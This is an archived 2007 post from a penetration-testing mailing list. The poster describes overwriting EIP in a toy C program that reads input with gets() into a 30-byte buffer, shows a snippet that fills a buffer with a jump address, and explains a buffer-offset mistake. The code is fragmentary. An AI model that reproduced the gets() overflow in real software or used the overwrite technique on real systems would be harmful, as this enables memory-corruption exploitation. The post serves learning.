Home page logo

pen-test logo Penetration Testing mailing list archives

Re: Re: Controling the eip
From: wymerzp () sbu edu
Date: 16 May 2007 04:10:59 -0000

Hello all, thank you for your responses!
I finally figured out the problem. It was rather interesting so I figured that I would share in more detail. 
Firstly the "program" to be exploited:
#include <stdio.h>
void return_input(void){
        char array[30];
        gets (array);
        printf("%s\n", array);
   return 0;
Secondly the new code to produce the ASCII characters of the address to be jumped to:
#include <stdio.h>

    int i=0;
    char stuffing[40];
    for (i=0; i<=36; i+=4)
    *(long *) &stuffing[i] =  0x84050804;
The interesting thing is that the address being placed in stuffing is not the address that I would like to jump to; 
that is 0x08048405. The reason for this is the buffer size. When I disassembled the function it had a buffer size of 
0x24 (in the book it was 0x20) 0x24 in decimal is 36. So, when I was writing to the EIP I was putting the last half of 
the address onto the EIP 4 bytes (I believe, it's been a while since Computer Organization) and then the second half. 
this is because of 36 not being cleanly divisble by 8 (i.e. 8 % 36 != 0). I, in my relative 'n00b-ness' found this 
rather interesting and was elated when I found out the source of my troubles.
Thanks for all who responded!

This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]